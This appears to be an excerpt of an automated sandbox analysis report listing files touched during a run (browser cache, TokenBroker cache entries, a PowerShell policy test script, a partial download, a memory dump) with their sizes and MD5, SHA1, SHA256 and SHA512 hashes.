eb367839f8a1b08eebc92bca57a3370e71cbdc055f1e5fdab44818e031467f8714f9cb59f23c060241c42cbee38848813a3409b2de16f3f1f78dfb64f657a0c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
594c76134c921252fb139fad6fd8ae79

SHA1
874096f28cab5759707d6ccc0137dfb1bf3287b6

SHA256
7fab8bebfa203230e746f6f45d0ba2394f9b36ae6384d4e23293918e54a68904

SHA512
4c554694feb4d2b72b754e76c12bb7cc741ca456686fc94fd6a506b17cab45cdb18938d928ebdd26b814dad3e9039729cb87fa298c7756c623c0ed7b6679cf4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
0bf7e7dbde7aef9ee6f3456df5af3fec

SHA1
8ac1f5a7e358c4dc732bd3c1616f8b7e213da302

SHA256
c5f688e45fa7c2c77dbda17bbf67095eed81b1ba39710fb2b044cffdd239d842

SHA512
645ab0159be94ae6968a2c91dbe6bab1d93ce8c001e8d38d4bc7a94a92d20ffb1e45e63c69514b1cc0e344e2d8ac0e3c6fe50931ca06fbb04b55022de11452a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Filesize
2KB

MD5
a8059e62da2025ba22082c3309ead922

SHA1
ec4165e696bb75488f91a7e8d5adce13255f3079

SHA256
1294a4b1381f1dc71c3e9ab878ec2f0e49091245056293fd300af77d36eb6820

SHA512
e0ac9686a690f4adcdb4917e930213609ae85513993b2797649064352f2d02c4b0edea8dcb2aa096be7aba9091ef3e4df45872df49d0679b29c0af138412604a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qgvnukmn.s0a.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 971654.crdownload

Filesize
89KB

MD5
86d68c9cdc087c76e48a453978b63b7c

SHA1
b8a684a8f125ceb86739ff6438d283dbafda714a

SHA256
df51babc1547a461656eaef01b873a91afcf61851b6f5ef06977e1c33e1b5f32

SHA512
dd627f071d994999172048f882ba61407461633634fdb2a3f2b8e6abff6324cc0d78682b5adc4aa4083e5baa1c981687f5c516d9e075eb00dfb58364cee1db04

Download Submit
\??\pipe\LOCAL\crashpad_2736_KJNCAQCHDWCMURCF

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/5060-761-0x000002C939DD0000-0x000002C939DF2000-memory.dmp

Filesize
136KB

Download